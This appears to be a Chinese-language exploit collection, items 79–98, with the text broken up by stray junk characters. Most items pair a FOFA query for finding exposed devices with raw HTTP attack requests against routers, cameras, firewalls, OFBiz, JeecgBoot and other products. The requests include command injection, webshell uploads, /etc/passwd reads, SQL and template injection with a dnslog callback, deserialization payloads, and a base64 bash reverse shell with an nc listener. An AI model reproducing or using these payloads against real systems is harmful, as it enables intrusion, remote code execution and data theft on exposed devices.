------YsOxWxSvj1KyZow1PTsh98fdu6l
" n! I, }5 d: tContent-Disposition: form-data; name="target"
# D% z5 B9 m: \. y4 X8 E! G" q W4 K! e% _. v! Z# a* P; j' F5 `
/Applications/SkillDevelopAndEHS/
/ Q: x( b8 t+ t3 [; h------YsOxWxSvj1KyZow1PTsh98fdu6l--- j# D8 l( o2 d: R. r
4 @7 c5 {& q! M
. J; N% }. _: |3 i6 {
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
4 g8 \: Z8 U/ d t# \, LHost: x.x.x.x
3 `+ S4 J6 {- U! R2 b' h* C& M. q9 g$ Y8 E! V
+ e1 S3 x+ @: i1 J* t R$ a: K { i; J! V3 J$ n
79. BYTEVALUE 百为流控路由器远程命令执行
E+ z7 Q. m8 |, n4 QFOFA:BYTEVALUE 智能流控路由器3 D B' B5 T, U
GET /goform/webRead/open/?path=|id HTTP/1.1 R( W0 ~; d2 ^8 W. K1 t
Host:IP
) W$ v5 t2 L( ?, p6 j" QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.08 G' [+ P& v7 i2 T" h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 \* f$ L- N. V& M+ x( Y3 @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 y2 [ B) ^2 s3 R! G: @Accept-Encoding: gzip, deflate
9 r" ^! J3 N. k+ {# `" UConnection: close
5 k7 ]; {" F: D7 J! T1 X! i. h5 `Upgrade-Insecure-Requests: 1
5 Y. O* H- ` t3 J) B# g, |
, t+ } q/ s1 F5 d! c5 H! P e5 S9 l6 q; x
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
9 O3 ]! P( j8 E' r' m4 r uFOFA:app="速达软件-公司产品"
^" X0 h' |/ ?" C2 P2 F5 l. y; cPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
0 s) D1 L$ j4 T. }# eHost: x.x.x.x8 h! l2 _8 a' _. X* c/ }) S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' C0 Z/ n; E2 O) E' q$ v" z
Content-Length: 27 z7 q8 P3 ~5 |- x+ D( |, P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ x3 I C" ?' S" E. e
Accept-Encoding: gzip, deflate
7 L. ^, \% B' G/ N" @. tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 ?4 H* [: v3 _: b
Connection: close
3 ?3 o' X4 ~- N8 iContent-Type: application/octet-stream! o) g$ b( K% j) y
Upgrade-Insecure-Requests: 1
! R) e- Q, X7 {; m
: X: A( U) v8 n5 P8 L1 T<% out.print("oessqeonylzaf");%>6 a# q7 b: O' y) [
$ W7 {! ?5 H& L% M8 [8 l: |! K
& Q: l& g1 D8 N# y0 a( OGET /xykqmfxpoas.jsp HTTP/1.1
2 \9 R" ]" L0 B6 m6 C9 [7 u. hHost: x.x.x.x
- I1 O/ A3 d; H$ f3 C- oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ _$ j2 [+ W) o4 S' r1 n5 P( K2 P& s9 F
Connection: close
7 A2 Q% D* ?9 vAccept-Encoding: gzip
! h r+ A4 T' H4 L! _+ |& y3 O2 \7 `
& S7 S3 W$ h' W
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露& [! J$ x5 V& m7 |& I& y7 g, E6 a
FOFA:app="uniview-视频监控"
1 e6 d6 I$ j& h7 l0 d. G# w9 rGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.15 T/ J9 E: _2 P( a
Host: x.x.x.x! K- A) i" P; `, q8 X& a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( z- s- T* d& T$ ?- a0 v e. J5 p2 y
Connection: close' g3 m9 I8 c' b! i
Accept-Encoding: gzip
) _ f/ w' g: Z2 n! Z
1 K- r/ n# s/ ~" d0 n
7 A3 t# e5 A, A& s; S82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行. h0 I/ R ^) R8 y- t. q
FOFA:app="思福迪-LOGBASE"
2 H2 U3 j5 J HPOST /bhost/test_qrcode_b HTTP/1.1
' ?6 ~" i6 s$ d& U7 j& c& N" PHost: BaseURL* O+ Q! v7 D5 {5 w4 U7 s
User-Agent: Go-http-client/1.19 j5 d( w, w) r" v
Content-Length: 23
$ I; a4 P. K+ f2 u8 h' gAccept-Encoding: gzip6 p7 }. | L) r m
Connection: close
1 ^0 N7 [+ D& F/ F! v3 \2 xContent-Type: application/x-www-form-urlencoded
Q) `- l& W- p5 y; \Referer: BaseURL7 h# F7 ?: ^, T' s0 P
+ v }! U9 R5 w
z1=1&z2="|id;"&z3=bhost
4 X d7 a' T! f; J
[# j6 u' I& C% V+ F9 r( p* y( G9 ~& v$ x/ D
83. JeecgBoot testConnection 远程命令执行
B* g8 ~- X- o+ SFOFA:title=="JeecgBoot 企业级低代码平台"$ Q1 L& s x* r! Q
# i Q7 |( F, j9 `$ u
4 f; {2 }8 r3 R5 }
POST /jmreport/testConnection HTTP/1.1
0 t7 C( R4 Y$ [+ p* m/ r5 a& yHost: x.x.x.x
- E2 y7 ^" a0 v) V# t$ zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ [$ t! ~- P; r" j' W& b( J1 e
Connection: close8 S% h6 ? F. c2 G# s
Content-Length: 8881* ]) E4 c3 d; F5 y2 J6 s+ P/ g J3 W
Accept-Encoding: gzip
* O) t) }- o+ Y! I& ]- X/ b9 i. I9 nCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
9 t; _, m/ }+ ]7 E/ D4 rContent-Type: application/json
" D4 n2 Y8 r6 Z0 ]
1 s. A Q0 V6 ]7 fPAYLOAD
4 Q: l9 ]. l* S7 C9 Y
8 d/ q% G7 D8 @7 f, C% _84. Jeecg-Boot JimuReport queryFieldBySql 模板注入% E; z6 h& y2 w8 A2 _* I
FOFA:title=="JeecgBoot 企业级低代码平台"
$ t7 @' A w$ g+ W; i, n5 k1 A: v
, h! C1 F5 N; b5 L2 ]
( p J0 J1 E0 S8 k- `9 HPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
7 @ I- M. }. g' hHost: 192.168.40.130:80803 i( m& B% W8 G0 T, A
User-Agent: curl/7.88.1
4 k0 X2 `5 W+ P! pContent-Length: 156' j7 _3 E" G8 m: u9 ~" H
Accept: */*) M0 q$ c' @ G. ?
Connection: close
7 O2 H% m4 k# p% TContent-Type: application/json
5 f" L8 u9 f( j! wAccept-Encoding: gzip
! N/ P5 n* W3 f$ T, o0 c# J6 ~1 Q7 g S! ^; U! A! S2 _
{
' Z; t1 P: B/ ] "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",1 a, f: q/ U# n1 f4 Q
"type": "0"
- I$ C4 C' G9 ^6 O4 g+ M}* Y# U F- |; w0 _0 T3 ^7 V; e4 O: b: m1 R( `
- r0 f$ G1 B4 t5 n
- B) V; |1 h3 @5 D# M& l/ c+ i# _0 e85. SysAid On-premise< 23.3.36远程代码执行( M/ j; b/ c9 v* F% i3 ^
CVE-2023-47246
* }; G' l6 P3 ]% a+ D9 iFOFA:body="sysaid-logo-dark-green.png"
' ^6 l# O7 z: E- d* z( vEXP数据包如下,注入哥斯拉马
9 s! u b) M- SPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
: p: G4 G$ N& z# M) n2 K3 {) @! rHost: x.x.x.x3 C: m* s. _+ J9 W. K4 ^9 m& U7 @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 b7 Q$ O8 l$ ?7 J& G5 DContent-Type: application/octet-stream
^1 a- |# s# r1 }* c/ {3 F) B! fAccept-Encoding: gzip6 [" Z9 k2 r! T* [4 x7 l+ x
: z# B, {' [! H4 H0 T3 FPAYLOAD
8 Y. d R) i' o, t5 ?
; _5 c2 s/ |% x; `7 ]0 P- z回显URL:http://x.x.x.x/userfiles/index.jsp l6 Z4 }) ]7 U/ y
2 D/ G: l6 f+ n/ s q( o% W' L
86. 日本tosei自助洗衣机RCE
) l9 N: ^9 C m* M1 I* h; ZFOFA:body="tosei_login_check.php"
: `8 b) }5 w# `- s8 q9 yPOST /cgi-bin/network_test.php HTTP/1.1- C' K0 ^! N. @9 c7 t6 c3 W% d+ ~
Host: x.x.x.x5 F( _$ X! y4 A _
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
* [1 W6 p4 h" R2 H. G6 u1 rConnection: close4 |9 ~. D& F8 D: ~' s% z* b
Content-Length: 443 x- z4 e. T2 I0 P" l6 v
Accept: */*
* D# s' V) u6 ~2 aAccept-Encoding: gzip
1 ]0 v* ~/ `" V1 v! E& D3 SAccept-Language: en
' z( \' y& J0 ^& k) ]- P3 jContent-Type: application/x-www-form-urlencoded
3 t; c ?. Z8 ?9 r, I2 J& i p
. r7 Q! }0 q5 ihost=%0acat${IFS}/etc/passwd%0a&command=ping
/ M- V6 r, W' j6 ~
' y3 J& _+ M9 C1 _/ ?" [
" ^8 s6 p: V% N) y% c87. 安恒明御安全网关aaa_local_web_preview文件上传7 p5 j" I9 b/ [, d. G a) r
FOFA:title="明御安全网关"
5 e# Y+ S$ K; R9 \/ TPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
! H' z/ t1 k( r" M8 wHost: X.X.X.X- B: ^# L- L( \2 n2 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 i$ y- b& T7 Y" A# AConnection: close/ G$ c5 u9 Y6 p, z
Content-Length: 198 H5 B4 B2 x4 a' ~. u
Accept-Encoding: gzip
) b$ M: g3 t. r8 x' b4 A- `8 ]Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd, c. l o; @ {, A2 K$ w: B
7 ^4 E( W5 D$ L0 f--qqobiandqgawlxodfiisporjwravxtvd3 b' {# `: u. V- p5 V; O/ L
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
9 F$ [) s- y1 X2 {0 uContent-Type: text/plain
: ?7 y2 K2 C: J. f7 m. M7 z1 F- w4 _
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
8 L z5 D3 z; b, f W' b--qqobiandqgawlxodfiisporjwravxtvd--
8 t5 Q( l( l% A) S2 Q! ~$ F1 S! g: u5 d5 W+ L7 D& E8 n
9 \3 K- T ^9 M' Z% k4 w
/jfhatuwe.php
9 ?- E- j+ f/ s) Y, e
) W* Q# ^+ F* s T" T88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
0 }% g) e e5 B: e2 iFOFA:title="明御安全网关"' j1 c& A0 \& T* S; g4 l8 i
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
7 z$ }% L! ~! R3 n" k( ]Host: x.x.x.xx.x.x.x
- B( D2 k6 a+ t0 ?" C" j5 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 R# H2 I8 ]) J) u( E7 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# w' G5 {/ U6 `* T/ pAccept-Encoding: gzip, deflate
6 J2 W [& U C/ I7 A9 R& D9 a# kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 s! e; S7 l0 }1 z; u3 {Connection: close
f. E! @3 @& t6 t' E
" z7 V1 O8 N% T: P" R$ N4 l8 R! _" E: L# |$ q" K/ X
/astdfkhl.php
7 K7 E. V2 x+ G$ \# u
* I5 x! ?* E& K0 V) L89. 致远互联FE协作办公平台editflow_manager存在sql注入+ }# ?" y! g0 c/ U
FOFA:title="FE协作办公平台" || body="li_plugins_download"
0 C* N8 b( q) J; X8 @$ HPOST /sysform/003/editflow_manager.js%70 HTTP/1.1" |- [" n/ k% d, u' c" n5 L2 [: z
Host: x.x.x.x
u0 ?0 p4 W8 w4 C/ PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 U- x' G& K! v, ]/ D1 T# j
Connection: close
) M' j* Z" v& k/ s6 g9 ]2 [) ZContent-Length: 417 x' h6 N* s* q
Content-Type: application/x-www-form-urlencoded
. A; `# m2 R; f: J4 {8 F" G- MAccept-Encoding: gzip
1 t0 l5 W. i3 ]# ?9 X3 S' \' s
! v2 {' a/ x4 S! |% F$ Xoption=2&GUID=-1'+union+select+111*222--+: Q i1 t v1 |+ X9 X- Q( L, v
$ V2 v1 \" m& z
8 B ^# l& r+ y7 S8 t8 U
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
f" z* C6 O( w, a) YFOFA:icon_hash="-1830859634"9 r: j+ ?8 }% Z
POST /php/ping.php HTTP/1.1% D1 O& \1 `1 [- i; d' V: H
Host: x.x.x.x0 @3 q0 K, w/ @$ m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
5 n# C; |( ^. A4 SContent-Length: 51
' R0 r6 J# W$ E* r6 ^- fAccept: application/json, text/javascript, */*; q=0.018 {/ Z$ H& I6 b% S3 j' a
Accept-Encoding: gzip, deflate
. C0 D& F, T8 NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# R$ C/ w7 q4 C% a7 \$ b
Connection: close
! Z8 {+ R% b6 x5 u; L! A. |, PContent-Type: application/x-www-form-urlencoded
! A! [! S" p h: N" [! g% X, y. p7 hX-Requested-With: XMLHttpRequest" U4 a# t6 E9 ~/ F
# r% y( G8 U4 D4 _) Njsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig% R# Q' T$ Y7 k w4 t0 g3 S0 T
* l, Q5 i1 {4 u4 Y
4 e( D' e U+ d91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
% E1 _+ T& O& e3 A, G$ @1 N/ wFOFA:title="综合安防管理平台"+ i/ O3 I3 Q* b( A
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1- X y( D. D/ l3 i& o% F
Host: your-ip. M3 N1 x) N- a9 x: |! S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
1 c1 V, Y) K9 EAccept-Encoding: gzip, deflate
; m5 M0 ?$ B: kAccept: */*% z& y& a: b+ z
Connection: keep-alive
6 a S) B$ T: _$ g' x' b0 x+ a* c8 N
! z: | @0 Q G( k( A7 s4 H2 B0 O
# K; E3 J4 s @) D/ a92. 海康威视运行管理中心session命令执行! K5 I5 m) ]4 A% f) J$ i
Fastjson命令执行
7 f7 u) i, `" P% G; S$ K f7 b. ]9 Bhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
, J4 X9 M: {2 c' F5 _# iPOST /center/api/session HTTP/1.1
) Y/ m0 d4 M3 q2 P3 _+ U7 dHost:
5 X& G! _; i; }: y. l; _% AAccept: application/json, text/plain, */*' C9 [. s, C$ h3 C) H2 Z
Accept-Encoding: gzip, deflate
/ {4 p. @/ x) k/ `+ \$ E3 @X-Requested-With: XMLHttpRequest3 p' z) _- R" _% E- S v6 o$ S7 j& |
Content-Type: application/json;charset=UTF-8' o- o, M& M" L @
X-Language-Type: zh_CN: D2 s) c) Z& ^9 m; G- j# e" ]
Testcmd: echo test
- |# n& c* J1 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
; h9 C2 j& y$ t$ jAccept-Language: zh-CN,zh;q=0.9# w0 u5 ^0 B. z2 o- T
Content-Length: 5778
# O2 ^6 S% ]! ?( B5 E1 p% H
" [& N0 O8 N5 \( d( e. U. |PAYLOAD
0 i2 M2 V: g. e' o
+ U) Q# W8 K" S g( v: o$ c: w! |% S5 l- e
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传9 S- F0 _3 A$ J6 E4 [" x% s
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="' a( A4 H) }, i* C' z* v. D
POST /?g=app_av_import_save HTTP/1.17 w, _5 S% m, F) P4 y. L) g
Host: x.x.x.x3 @6 S2 Q! I3 T; X+ v- W
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
; |/ X$ b0 n! B# G+ f: v I" Q- ZUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; a) N$ t6 {. X4 q# r2 @, w9 T/ f
------WebKitFormBoundarykcbkgdfx
8 p! v# V' z4 LContent-Disposition: form-data; name="MAX_FILE_SIZE"; _4 m3 y' T9 Z8 y- N+ m8 K9 i% S
1 E& W) [# {1 }8 ]* C5 R10000000
# E; K9 n5 f* J7 q q------WebKitFormBoundarykcbkgdfx
9 X/ c/ ~! C: c! q* v, m _; CContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
) g9 P6 c8 f& V# ~) pContent-Type: text/plain
1 l5 m. Q2 O, |5 ~7 m; q8 A8 \' L! v. B0 Q, m0 Q
wagletqrkwrddkthtulxsqrphulnknxa
# S' J, j; v* [* |) B------WebKitFormBoundarykcbkgdfx
5 S7 i; x0 O6 s- |% kContent-Disposition: form-data; name="submit_post"% ^4 F7 H u6 Y: U0 F; ~
1 V" n+ o2 X& ~5 `8 _% a) @obj_app_upfile
5 N7 E0 D% d3 @7 [. U, d------WebKitFormBoundarykcbkgdfx
* C2 \1 U) L$ Q4 _Content-Disposition: form-data; name="__hash__"$ Z" y" D! J7 e9 R
0 q* T+ z" d) h' ^0b9d6b1ab7479ab69d9f71b05e0e9445. `$ B) h6 @5 f& r% `0 F
------WebKitFormBoundarykcbkgdfx--# t" c& V0 k( @6 \" \7 r+ p' N
7 k( }; X) n% h" y
6 ]; F) P" n2 k! w2 T: j8 m3 X
GET /attachements/xlskxknxa.txt HTTP/1.1$ u" d. M9 r5 O/ |8 S; }, }
Host: xx.xx.xx.xx
0 i3 S4 ~5 r# m! UUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 c5 M* @2 z, `, A' P. {5 [: ]2 P8 G
* s$ J$ I5 M i# e9 q
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
7 m1 b& }: ]- O: I! o fFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="4 ~0 I" q" n3 W6 e3 g( U% q l
POST /?g=obj_area_import_save HTTP/1.1# ~4 S7 F, `9 g/ B* a9 Q+ F. ~
Host: x.x.x.x; n$ y: v2 q$ r9 K& O
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
% u$ d! Y( j' _3 W2 m& EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
$ N8 S. C# } p/ a7 V2 [; K o2 v
0 p/ F# {+ I2 Q, L: [9 a1 u+ X------WebKitFormBoundarybqvzqvmt
/ ?) `' X6 F+ A: T/ o' {Content-Disposition: form-data; name="MAX_FILE_SIZE"9 ~( g: ^/ F( v
: F0 B9 O/ G. W. r, ?4 H0 d
10000000% X! T4 T3 W+ ~& s
------WebKitFormBoundarybqvzqvmt
5 {1 C8 x+ t/ S' w( q& YContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"( O4 z! i# L3 o9 c- B
Content-Type: text/plain
( j- a ~3 s( M3 i( x
7 ?3 C9 L+ b8 |7 |' f; d* n0 X, zpxplitttsrjnyoafavcajwkvhxindhmu
' g5 w1 U- G4 |+ ]------WebKitFormBoundarybqvzqvmt
, @0 z m' G: ^" u; [ oContent-Disposition: form-data; name="submit_post"- Y" t- ^4 I6 y# h( F+ B
* ~2 n4 W( O$ N v9 p3 `
obj_app_upfile/ `7 P; E7 o; q9 A1 H+ N5 A+ Y- {. d
------WebKitFormBoundarybqvzqvmt
& D- |/ g- k' Q5 G: MContent-Disposition: form-data; name="__hash__"+ y( `5 R1 c3 l2 J
. o4 Z1 E; q/ x6 M- \0b9d6b1ab7479ab69d9f71b05e0e94452 R$ j8 T/ S- S# w0 Y, J8 }% s! q
------WebKitFormBoundarybqvzqvmt--
# [, Y2 K& R4 E6 W- B! l: I( M
4 `) ~8 J' s% j- j( p
X! p- R+ B, |/ l
- y9 A9 Y9 J# {+ T* D# ?# [GET /attachements/xlskxknxa.txt HTTP/1.1# O$ l7 B. ]$ P8 `+ C- ]
Host: xx.xx.xx.xx
/ ^3 B1 m( d( v, v( NUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ h! s: p1 i4 D* x/ _; p4 n
7 t0 y$ G, ^4 Q r8 L
7 [+ e+ I- k6 n: w: `1 K
. l; L2 T. \1 v4 q95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行$ x/ P' p$ I2 ]2 j2 E4 G" F! [
CVE-2023-49070. l; ]0 }' a; L, C0 u9 ` s
FOFA:app="Apache_OFBiz". ]% G- a. P2 Y/ C, K0 N1 U
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
: I: ` C) x5 V2 \9 v1 X1 F4 z% qHost: x.x.x.x
$ B+ P0 j+ x! z4 X, c5 C1 EUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36( y7 |( k4 m$ i( n5 D6 a
Connection: close
3 i7 K4 E5 J' f; Q# FContent-Length: 889
8 g% k h3 {* P" |, \7 D; [Content-Type: application/xml/ G! a9 A6 _+ ?! u+ l5 E# C! u
Accept-Encoding: gzip
' z0 @ h/ G; j+ e2 m- }5 {( ^8 h: `, v ]) {# U
<?xml version="1.0"?>
1 b- l# x3 z6 A' u<methodCall>
" v. ^# `- f* o3 ? <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
6 ]( L' O( q: U# C! \ <params>
5 ?& w5 x1 Z& s4 y5 ]+ l <param>/ s$ U) E+ m8 R# A @9 B
<value>& r' \1 E6 u- H" p# s$ O
<struct>5 e% z/ r3 \, }& W9 B5 a; j \7 a
<member>7 F$ s! u- J) Z0 u( X
<name>test</name>
3 q4 L# W; B8 [# r! ~% K, j* u7 P <value>4 Z1 f+ c1 t- k/ _1 a
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>, p8 F! }% H: a3 F+ w
</value>
9 Q- H o6 J. E7 y </member>
6 [ N' {' m+ c- L8 j& K </struct>5 t% `0 D ^ Z, {( e) Q$ ?
</value>
1 d' p0 [' L' \- I- F </param>/ }/ t4 F, r0 U4 c5 h
</params>
* @5 {' {3 t- H4 ^, a</methodCall>
* J! D0 \# j( |4 c# l, {3 Q) ]2 [
0 c9 X: d3 W0 i- z" P! h ^9 _
4 e3 J7 R# ]( {+ m9 Z用ysoserial生成payload; O, A$ X) h1 {" o8 p$ C$ E
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
, P9 i5 E8 l! i2 {
2 T, T2 S; G0 x6 W0 l* J+ e' ^& A1 f, w& \8 N' M2 u+ ^
将生成的payload替换到上面的POC' c* f9 d7 V5 x0 `; c& o9 o% j
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
, w" w5 g) S( Y5 e8 fHost: 192.168.40.130:8443$ `' F. ]8 B+ I+ r; \' D2 X5 d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" V O; K7 e6 ?' i: M" d
Connection: close
7 f- x+ u5 h o5 f( ~8 q6 h& t& V5 HContent-Length: 8898 |2 L: a5 C% S) D& H- ^* x* i3 S
Content-Type: application/xml/ ^; h5 V3 f3 Y. _& Z* [
Accept-Encoding: gzip5 |3 o2 d" L, X9 J5 T9 `
& e( P: B$ D- }( s3 m
PAYLOAD: ?$ p! \ e4 [+ k" w1 U! ]
5 G8 G4 Z5 a* x7 Q! v$ m6 B4 ~0 |
96. Apache OFBiz 18.12.11 groovy 远程代码执行; M* H$ R5 W. S3 V
FOFA:app="Apache_OFBiz"
" w- ?1 R* l! s+ APOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1% U+ w% v' [8 \2 j9 ?
Host: localhost:84434 ]8 J- A+ K2 I. H% W' l& h! J% v/ R# d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' _) A: L' E V/ v- l0 f0 G' ?7 H
Accept: */*
5 O6 [/ f+ k+ W3 j. G% ~* ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* q) c' h3 i; O! F
Content-Type: application/x-www-form-urlencoded5 k! j' W5 V& S8 i
Content-Length: 55
1 t2 x* D0 C/ f
: y9 o" o; P$ i3 p& V; O9 QgroovyProgram=throw+new+Exception('id'.execute().text);
: M6 w- Z' M+ A O/ g% t! o# R. f0 D- J: u1 e1 s" e* H
+ s4 M1 a" O# T反弹shell5 ~! F7 y; K! q
在kali上启动一个监听
7 t" e [5 X# f" K6 nnc -lvp 7777
$ M: {/ I; E M, ?& Z! f8 H( m0 U: q: m0 n. r
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.16 M0 U0 U- j+ U% B3 ]
Host: 192.168.40.130:8443
/ e& _0 K6 i/ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
8 @, s$ A) X! p& z5 f6 G/ Q( PAccept: */*/ p* q$ w8 u% S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 T/ S% w- P8 h7 ^
Content-Type: application/x-www-form-urlencoded& e7 I1 V( D( ^, {; j- R
Content-Length: 713 G0 E; ~* ]% I3 L
9 y4 P8 ^$ s0 {, T9 o* a
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
) T7 ^! i9 r% h \# m1 {$ Z8 n* w6 y* F7 I: v4 R0 m$ ~1 m% k
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
" y% ~2 V8 r, T! _FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"* M8 c: A) \4 S: j
GET /passport/login/ HTTP/1.10 \) I% \5 P; K) p" p* [7 a
Host: 192.168.40.130:8085
5 q4 }6 j" n, z5 ?- |" d4 F& BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ d9 X1 G9 z# y: D# f* \8 UAccept-Encoding: gzip* @7 Q3 A* _4 |9 _4 O# G. m
Connection: close4 v( j& g c9 H
Cookie: rememberMe=PAYLOAD7 V3 U* `3 y" q( A5 ^/ r6 Z: A
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"( O- k. I7 Q& r% u( V1 X
) S& q' o; s% C% Z+ k; S
! L r, q3 z w1 O r* c98. SpiderFlow爬虫平台远程命令执行( q+ n! w3 q6 X
CVE-2024-01955 N/ M. j" W; e4 |- G+ \' x
FOFA:app="SpiderFlow"
0 y8 O( I: ^7 ]7 @; k4 g- WPOST /function/save HTTP/1.11 d G9 K0 t7 {+ M" s3 _! R6 X+ J
Host: 192.168.40.130:8088
